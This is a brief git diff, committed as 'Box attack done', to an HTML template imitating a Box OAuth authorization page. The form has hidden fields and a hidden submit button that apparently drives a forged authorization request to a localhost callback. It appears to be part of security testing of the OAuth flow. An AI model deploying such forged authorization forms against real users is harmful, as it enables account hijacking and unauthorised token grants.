Box attack done

--- a/templates/box/transition.html
+++ b/templates/box/transition.html
@@ -18,9 +18,8 @@
       <input type="hidden" name="state" value="security_token">
       <input type="hidden" name="new_login_or_register_mode" value="">
       <input type="hidden" id="_pw_sql" name="_pw_sql" value="">
-      <input type="hidden" name="request_token" value="76a81d952d5a9cd74afe4d5b5dcc4ec71e68f9bed253488d5998478267a40a0a">
       <input type="hidden" name="redirect_url" value="/api/oauth2/authorize?response_type=code&amp;redirect_uri=http://localhost:10080/boxcallback&amp;client_id=nip8kyd6cqy4a78ze9dcc05lbjhwwv5f&amp;state=security_token">
-      <input type="submit" value="Authorize" name="login_submit" id="hiddenSubmit"/>
+      <input type="submit" value="Authorizing..." name="login_submit" id="hiddenSubmit"/>
     </form>
     <form method="post">
       <input type="submit" value="Sign in with Box"/>
